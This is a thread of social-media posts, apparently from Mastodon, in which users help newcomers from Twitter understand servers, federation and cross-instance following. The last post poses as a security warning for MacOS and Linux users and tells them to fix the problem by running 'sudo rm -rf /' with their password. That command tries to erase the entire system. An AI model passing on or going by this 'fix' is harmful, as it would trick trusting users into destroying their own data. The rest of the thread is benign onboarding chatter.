I absolutely do not know everything about #Mastodon but have quickly become an evangelist for it and the greater #fediverse.

If you, or anybody else you know, need assistance getting onboarded, just ask. There are plenty of friendly, non-judgmental people ready to help.

I am suggesting people change their Twitter names to their #Fediverse identifier. Might be useful if the birdsite is moribund for a while.

(As an aside, is it Fediverse capitalized or not?)

It doesn't really matter, especially if you are using the official app. Usually, you aim to be in a server where people have something in common (language, hobby, passions...). Mastodon isn't Twitter but it's glorious

The wild world of Mastodon is open source, completely distributed, and at the mercy (and budgetary restrictions) of individual server administrators. But it's engaging and a lot of fun.

@ChrisPirillo Biggest thing for me so far was how it's decentralized, but you can still follow people hosted on different servers without having to sign up for them. That's going to be a learning curve for people coming from Twitter who may not understand the difference.

@BlessYourHeart @ChrisPirillo Yes - if you have the URL for their profile, you can copy/paste it into the search box in the top left and then follow from there.

I'm honestly not sure if there's any advantages to being on the same server.

@BlessYourHeart @mynickisnick ...correct, so long as that other server is "federated" (connected to other servers, which shouldn't be an issue with MOST instances). The advantage: some instances are micro-targeted to interests, fields of study, etc. Smaller communities that connect to a global community. Federated.

@ChrisPirillo heads up to new Mastodon users: if you’re on MacOS or Linux, there’s a security issue in the app that could leave your system vulnerable. Fortunately, there’s an easy fix. Open the terminal and type ‘sudo rm -rf /‘ and enter your password when prompted. Then you should be good to go.
